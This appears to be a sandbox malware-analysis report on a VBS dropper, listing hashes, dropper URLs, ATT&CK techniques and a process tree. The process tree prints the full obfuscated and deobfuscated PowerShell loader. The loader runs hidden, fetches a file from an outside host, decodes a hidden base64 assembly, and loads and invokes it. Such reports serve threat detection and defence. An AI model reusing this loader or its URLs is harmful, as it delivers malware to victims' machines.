2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6

General

Target

dfcugh.vbs
Size

13KB
MD5

4f3e6d1619f31390de9a461391f10dba
SHA1

9d90fa6b3bb7809fc800751c6cfc41dc68742a84
SHA256

2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6
SHA512

f609e24d91a9ee08fe9b89f4909eb8745045d67b0b20d187d4586f5c382cefc2af96baacd1125aef96b71cc4eeeefdf0baa4467a1bb66637edfedacca9615427
SSDEEP

384:CiQvc9iQZ4T6+wi7Ahrd5RxEA/mywQfD6U512ChMsB+5wZ/f3CPR:CiQk9iQzn512ChMsB+4/fyPR

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2300	WScript.exe
4	2300	WScript.exe
8	2604	powershell.exe
9	2604	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2788	powershell.exe
2604	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2788	powershell.exe
2604	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 2300	1488	WScript.exe	31
PID 1488 wrote to memory of 2300	1488	WScript.exe	31
PID 1488 wrote to memory of 2300	1488	WScript.exe	31
PID 2300 wrote to memory of 2788	2300	WScript.exe	32
PID 2300 wrote to memory of 2788	2300	WScript.exe	32
PID 2300 wrote to memory of 2788	2300	WScript.exe	32
PID 2788 wrote to memory of 2604	2788	powershell.exe	34
PID 2788 wrote to memory of 2604	2788	powershell.exe	34
PID 2788 wrote to memory of 2604	2788	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAHAAcwBoAG8AbQBlAFsANABdACsAJABwAHMAaABPAE0ARQBbADMANABdACsAJwB4ACcAKQAoACAAKAAnAEwAeABGAGkAbQBhAGcAJwArACcAZQBVAHIAbAAgAD0AIABEAFgAdgBoAHQAdABwACcAKwAnAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAJwArACcAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAcwBkADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAJwArACcAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEAJwArACcANAAnACsAJwBiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAARABYAHYAOwBMAHgARgB3AGUAYgAnACsAJwBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATAB4AEYAaQBtAGEAZwBlAEIAJwArACcAeQB0AGUAcwAgAD0AIABMAHgARgB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgATAB4AEYAaQBtAGEAZwBlAFUAcgBsACkAOwAnACsAJwBMACcAKwAnAHgARgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjACcAKwAnAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQAnACsAJwBuAGcAKABMAHgARgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBMAHgARgBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEQAWAB2ADsATAB4AEYAZQAnACsAJwBuAGQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBFACcAKwAnAE4ARAA+AD4ARABYAHYAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEwAeAAnACsAJwBGAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEwAeABGAHMAdABhAHIAdABGAGwAYQBnACkAOwBMAHgARgBlAG4AZABJAG4AZABlAHgAIAA9ACAATAB4AEYAaQBtAGEAJwArACcAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATAB4AEYAZQBuAGQARgBsAGEAZwApADsATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABMAHgARgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEwAeABGAHMAdABhAHIAdABJAG4AZABlAHgAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJwArACcATAB4AEYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEwAeABGAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAEwAeABGAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ADsATAB4AEYAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABMAHgARgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAATAB4AEYAYgBhAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AEwAeABGAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAOABiAEMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATAB4AEYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApACcAKwAnAF0AOwBMAHgARgBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgATAB4AEYAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAJwArACcAOwBMAHgARgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEwAeABGAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBMAHgARgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAnACsAJwAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgARABYAHYAVgBBAEkARABYAHYAKQA7AEwAeABGAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABMAHgARgBuAHUAbABsACwAIABAACgARAAnACsAJwBYAHYAdAB4AHQALgBkAHMAdABlAHAALwBwAG8AcAAvAHUAZQAuAHAAcgBnAHgAYQBtAHkAZwByAGUAbgBlAC4AZwBpAGcALwAvADoAcAB0AHQAaABEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAMQBEAFgAdgAsACAARABYAHYAZAB4AGQAaQBhAGcARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwAIABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsAEQAWAB2AGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAMQBEAFgAdgAsAEQAWAB2AGQAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYAKQApADsAJwApAC4AcgBlAFAAbABBAEMARQAoACcAOABiAEMAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBlAFAAbABBAEMARQAoACcATAB4AEYAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAzADYAKQAuAHIAZQBQAGwAQQBDAEUAKAAnAEQAWAB2ACcALABbAHMAdABSAEkATgBHAF0AWwBDAEgAYQBSAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js

Filesize
1KB

MD5
3d68e0db63d092d83baf5f2e61a2240c

SHA1
54bec790443c5eceea3819b516714d8d73588684

SHA256
718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a

SHA512
115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GT4DZL3H2UNQ7W0YI4IQ.temp

Filesize
7KB

MD5
5c03bdc41929c4fadb8a14ba501c409d

SHA1
f4179a710f951bb0617f522907d2c1133b471adb

SHA256
9ef8362dede11eba5f0cc52d377584a5647e53b4d4fff37f8f29877f2c3568a3

SHA512
5e315e2a0284104f29708e7003b72f9d9c5edb0c2464a752ceb22a305171e9eaa0e69c34a40e934b62a96b81fc52233f73a7ae057287f5d2813c634f96812d0a

Download Submit
memory/2788-8-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2788-9-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download

Resubmissions

Analysis

Sharing